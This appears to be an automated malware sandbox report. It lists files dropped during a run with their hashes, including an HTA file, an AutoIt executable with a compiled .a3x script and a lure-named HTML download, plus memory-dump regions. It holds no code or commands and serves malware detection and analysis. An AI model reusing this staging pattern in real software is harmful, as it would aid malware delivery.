SHA256
9c677ca0b56df3f2f0a93943a6610c449fdb72c6fd99ddfaa186cdc68415a6e3

SHA512
9c50b1481f47905cf53476a86ca1cd7a768ffae20bbd491a01486ed89b1a253c6f498937c14db63f129795a3b6d71d604ba219e8ef640c3e9af89c156ab275c8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
1a3126eb331f82ae504840527c8e27fa

SHA1
5949ed6a2dd16a610bd7e99d1ffac030f7277af2

SHA256
4b2ee7d31480ec20dbdf5ded962c57ef0391c8397fc947d73db63873af8b45a0

SHA512
e6aed7b47d58f2add583774bf72b59bab28a49225c970890b2a014967f73eabd51ac5776d5549e4a0d7894f861e9bacb286131c4fcd90f63b6694b9d4c9d0a49

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
136KB

MD5
387463c29e472ea325dc1ffa6527f1c9

SHA1
5467de58d221ab28cf05469db7d4e9074eea1729

SHA256
c2c8ddf303ed2699f5dc099717e375344b19c6a49b50e96321af563d725be795

SHA512
b019734097e21d3a157592abefbfa996d6d692bd0c7a5d8d02531b01908c634c3409e8fe53eb1afec948ac84b3bd8e89f6eb42a8976b57268219ba07357c3aa6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
136KB

MD5
6256e412bd6dcc3271884f932d4e3ab1

SHA1
e6e3ba00859233803d0df95e19e807f1908998e8

SHA256
3063775d124ae00a84b622461740a0295d2ca86aea954e100c430ed48c955762

SHA512
68caf476698bbab319d38bd3a43b1f6ce894510247661c215918cf9dd3cfba5ffc846e8ffbb1fa6f1e0a65a8e6102c6607d3b6f7f7f6d70c8c640bba51239e69

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
112KB

MD5
32fd940b9433dec50af7929a8790b021

SHA1
a3ae258f2cb3f7afefbf6f1fc7cd35d2b6a58b38

SHA256
79838fb050d5f22763f4cafcdc15c5cc0ba5b95e70a3e9c0272125e160051039

SHA512
0ba625cd18e9d3713e1d87e8d1fea21502f353cf85aee0dfde8ddfd325ea676eb9ccd2325f7238319ae24f7cd69a25e7c7c09a9221f4c168b05ad7e066fc6f97

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57f54d.TMP

Filesize
111KB

MD5
0c17d9749aff10311af81483553e501a

SHA1
95b43b42bb7f7eff3265c4a0247ed0d251ffbd56

SHA256
727029887534b8df77f33239ee400c9cafe250aa87691346cd487a5fa4b81e98

SHA512
9f6b5e3389b71646fe5b4ea6f29333d02c6a12e27ec04463f3654a22855814261febef06d319fbcb8ed4b728b75a824d95dd1858dc95e4ab43d7bd59a3cb0b0c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
010c219c46b4439bc787644989e20389

SHA1
f3a63066ab4446458bd6417386777e39e09b9b25

SHA256
2a7c264d94398912c720de578b6d959b2457582182b8f2cc98281f27ef6701aa

SHA512
c6967d2a37b9a45f491138b638d99e5fa09ef38f680c887bfbc2336c683deae86f4d6626f6defc8c0aabccf545923a708df05825de8102086a8f333a58e74963

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f6348e733fbe04d877018dfaa5bd8dba

SHA1
e4df3a5959bdc9c40f09d256ece5c20c6d1eff43

SHA256
2a4833678fec44de23dc3a95f4151908387d069a8ed6ab24db0c33ded7300c84

SHA512
919a7cfa4248951dd98d87670ddb90e8a8e8a32c026437e02fcd913dd29f62946d8a50b2479df2ef0b66f0060a0acdc5c34e859ecbcafa8f85f20a00e5b99502

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cbcfb40a567467eeba7a853cfb4ef3dd

SHA1
cf46074872b7206cdb0af441ced303ea8b193a8c

SHA256
0143aa3171e3309a336281bc52efe807e9d8252270152b93fcaafd20816669ca

SHA512
5d5b2290cda7b6c52d6d2f10b9cc62122956835ffddf6f35889aca4c774fcf960ce59f0fb7421be4c77d64ebc9a38bab84fad6ff48da5c6590863dae599f764a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
2374beb078585f1702175f22da069b76

SHA1
0a91598ce98adecf0f573e038cf43d31d1a2b496

SHA256
45391f74f5c26990e932fabc6108876b0f8954268cfd78421b8c8f536cc2bf37

SHA512
a86d0e95fecfe4e514b2c55820d0a6b511b2a3f0c0a784d106129cfd939d5f9fe1039e2c3f9c4ebde0c3b0b52a57198793af535c4849782e87c2483eeca6f639

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
234bb672215b3f031e8f6515c663a6c0

SHA1
595129b880d2b3eb2054e16b8aa01927460ffeb7

SHA256
b03711d67a4ff34a768375edf662b801d8e55e5b248b3ddf28b365c1811aa23a

SHA512
ed531d6b6417ff031a81aaedb7fbe0b3172d0ca67e2c0563c49f36da78b1480a523a54825f4659cdd07edc9e16d12099515ca22150fce1e2aa2f0777e8498e6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
22KB

MD5
0d033bc9e75c76e8630b20a467f822b6

SHA1
c4bc53ca5ceca19e0a1b1c648a3f6e94792fa453

SHA256
67888a8128d0c61f3f4dcfadd3f4a713318bcca7067e87d4985738693ae48779

SHA512
a7cbc0f179106183d6e24bfc57ac02d1069fc960a87da242aaaf7ca526057a00ea8d3e06b7bdae5802193e5486a0c673e98a86219e44bcfd02ed80f7bc40afa4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
83e83272715f61ebe4c67e4026dfd985

SHA1
7ea71e3de7a7bc162bbcf7734464778d56485b01

SHA256
64e44bc9ae937f3b32007b5bbfd444be7ad204f20bd7060db376f05bc87fea9d

SHA512
4f75338257e2553eade639ea3dc4bc4bd33f64f6a5b799fcf5f31c5e1a48dc1488c74ed23ef32ab129da90b25f6462fd6d4b84d911658a3f4800f76f02136cf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_thvxojam.2es.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\FKabAEa

Filesize
32B

MD5
0cc71f952649352fbb2412454463e1d2

SHA1
32e1f93ee98c7e5e97ca8dd5b19636013a3a3323

SHA256
7d4ef3fb79a158954d3112d7948d20f16448e83b6784d2192c4d9b1e4fa3cab7

SHA512
17f6723b93a07afceb28a8d36a9bc497ce973f55af6a2120b1c0d172c92a024c52ff3121b87685be0cfcc598a31ba38269011e8116f95abf0c929fa94be4ee24

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
24d3adf9c588d15e87b89f2dd26929c4

SHA1
0f973e9eaadf71acf47b3d547ab499a6cc697325

SHA256
e8dbd4db77675dfb20c6d6d61832ed2224bbc72941b3e2f0e1c944ab5b395317

SHA512
2d1b5f1f475d324023745412154aef2062372c0f2c9a7c56334fd7c600e2f0b4fd2a1cd9753c151f9196217742090cab43647f07af70d6f12e344e165714f953

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
9847374089c619e8e79cbafd50cb6d27

SHA1
ac0fc2971c0c6aec65963004f8ca2c21b9480bb0

SHA256
0b37651e8088458b596d93a31eb1886841b2faa763d5aa5a7bb8380bc5369dcd

SHA512
faa72d690fc428ad3346e2a5238df1a2cb60214f6985001dff567dbb7001c00d6ab4f4a6e859dfa3cd2d889528d55af715772a785d113b161e6c6decc3e2233c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
2edb8eb427328bf8c8c9360eac77da8b

SHA1
cf15acc3155f04e4a0400513a60e5cf41daf8371

SHA256
d78cef32634ec975abafda5427e1fa41b9f33ebf380956945390e6e05326880f

SHA512
3b9d3dde0e34c2567792ad79e6c7051574e49213cb0810e6d9460c3c85599304f7895570ab04b2236c395d162390e0592604d1028672ac74925308ac9038b93c

Download Submit
C:\Users\Admin\Downloads\Scanned_05_28.html

Filesize
8KB

MD5
504e984271e9ba573fd67de5583df8bc

SHA1
172a92868d1339086ba9dacd7a80caba2b0980eb

SHA256
f9afc9391e19fe827dff90b01456fdc0d4915cefe2b5d76aabc7f82c2967049a

SHA512
657c681d176800029cc9c90bf534f6038d3b842878bc5635179e9753d3304dd973415db8ac37a718729a57cbea7cb598c50006854137af99b5e23405e2ce6612

Download Submit
C:\owsa\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\owsa\file.zip

Filesize
822KB

MD5
9dfce9e08c3a291212539e82b3dad032

SHA1
3f4496a66296c3f22c80adab10958d8433e7534e

SHA256
98084e47a6945d721f44d235fe2789bd99ab3cf9026d4f20064b1919bc9af1b1

SHA512
b14cad90859c55cff8c8192bb1436875fe66c36c82048b326507d1baaca7130e32c04ece3dbbb7bb733b5ab4d4ff38b434827a688ff007a6c81e699fab974d9d

Download Submit
C:\owsa\script.a3x

Filesize
547KB

MD5
77fd989ebd6cfc7b75b36474503c1ad6

SHA1
2cf50b3b481900635ffe63735bacdefacae8e85c

SHA256
b4accf076121e1074fa593d9a3c6925c59616c3e7abcbe524a3cec6fd36b682f

SHA512
58ef7e74c5d702177963b6d608ac0a7bcb5a661b7ca6e4925e961cfa41b1b1584155f6afffa77c576ca94d8c579336157072c296595fc1d8a92bb7a59d230f9e

Download Submit
C:\users\public\default.hta

Filesize
2KB

MD5
47122a00ef40b1771c57b2d1c79f38be

SHA1
ed6fd59265334ec3a69774ab638275d3541ee3df

SHA256
395d9796d5e95e5bb1f3218886fb1dd235746452535e6c1e9fb56ccfb8394119

SHA512
200045ea397fce58abf84a074fc519911b8a360dffb73f67e2f3ac3e58d7dc6b63e114d215ff100decd6e130743ba7e41e8117c39d146f1e7307f600349eb4c2

Download Submit
memory/1120-122-0x00000000070D0000-0x00000000076F8000-memory.dmp

Filesize
6.2MB

Download
memory/1120-128-0x00000000077C0000-0x00000000077DC000-memory.dmp

Filesize
112KB

Download
memory/1120-173-0x00000000709D0000-0x0000000070A1B000-memory.dmp

Filesize
300KB

Download
memory/1120-174-0x0000000070A20000-0x0000000070D70000-memory.dmp

Filesize
3.3MB

Download
memory/1120-175-0x0000000009830000-0x000000000984E000-memory.dmp

Filesize
120KB

Download
memory/1120-180-0x000000000A120000-0x000000000A1C5000-memory.dmp

Filesize
660KB

Download
memory/1120-255-0x000000000A270000-0x000000000A282000-memory.dmp

Filesize
72KB

Download
memory/1120-264-0x000000000A260000-0x000000000A26A000-memory.dmp

Filesize
40KB

Download
memory/1120-304-0x0000000070A20000-0x0000000070D70000-memory.dmp

Filesize
3.3MB

Download
memory/1120-399-0x000000000A2F0000-0x000000000A30A000-memory.dmp

Filesize
104KB

Download
memory/1120-404-0x000000000A330000-0x000000000A338000-memory.dmp

Filesize
32KB

Download
memory/1120-162-0x000000000A5A0000-0x000000000AA9E000-memory.dmp

Filesize
5.0MB

Download
memory/1120-161-0x00000000095D0000-0x00000000095F2000-memory.dmp

Filesize
136KB

Download
memory/1120-160-0x0000000009640000-0x00000000096D4000-memory.dmp

Filesize
592KB

Download
memory/1120-153-0x0000000009ED0000-0x000000000A092000-memory.dmp

Filesize
1.8MB

Download
memory/1120-146-0x0000000008EB0000-0x0000000008ECA000-memory.dmp

Filesize
104KB

Download
memory/1120-145-0x0000000009850000-0x0000000009EC8000-memory.dmp

Filesize
6.5MB

Download
memory/1120-130-0x0000000008110000-0x0000000008186000-memory.dmp

Filesize
472KB

Download
memory/1120-129-0x0000000007DE0000-0x0000000007E2B000-memory.dmp

Filesize
300KB

Download
memory/1120-172-0x000000000A0E0000-0x000000000A113000-memory.dmp

Filesize
204KB

Download
memory/1120-126-0x00000000079C0000-0x0000000007D10000-memory.dmp

Filesize
3.3MB

Download
memory/1120-125-0x0000000007850000-0x00000000078B6000-memory.dmp

Filesize
408KB

Download
memory/1120-124-0x0000000007700000-0x0000000007766000-memory.dmp

Filesize
408KB

Download
memory/1120-123-0x0000000006FF0000-0x0000000007012000-memory.dmp

Filesize
136KB

Download
memory/1120-121-0x00000000068F0000-0x0000000006926000-memory.dmp

Filesize
216KB

Download
memory/1708-539-0x0000000070A20000-0x0000000070D70000-memory.dmp

Filesize
3.3MB

Download
memory/1708-661-0x0000000070A20000-0x0000000070D70000-memory.dmp

Filesize
3.3MB

Download
memory/1708-538-0x00000000709D0000-0x0000000070A1B000-memory.dmp

Filesize
300KB

Download
memory/3948-85-0x00007FF951EE0000-0x00007FF9528CC000-memory.dmp

Filesize
9.9MB

Download
memory/3948-100-0x00007FF951EE0000-0x00007FF9528CC000-memory.dmp

Filesize
9.9MB

Download
memory/3948-84-0x0000022A784A0000-0x0000022A78516000-memory.dmp

Filesize
472KB

Download
memory/3948-118-0x00007FF951EE0000-0x00007FF9528CC000-memory.dmp

Filesize
9.9MB

Download
memory/3948-83-0x00007FF951EE0000-0x00007FF9528CC000-memory.dmp

Filesize
9.9MB

Download
memory/3948-79-0x0000022A77350000-0x0000022A77372000-memory.dmp

Filesize
136KB

Download
memory/3948-78-0x00007FF951EE3000-0x00007FF951EE4000-memory.dmp

Filesize
4KB

Download
memory/4300-875-0x00000000709D0000-0x0000000070A1B000-memory.dmp

Filesize
300KB

Download
memory/4300-876-0x0000000070A20000-0x0000000070D70000-memory.dmp

Filesize
3.3MB

Download
memory/4300-998-0x0000000070A20000-0x0000000070D70000-memory.dmp

Filesize
3.3MB

Download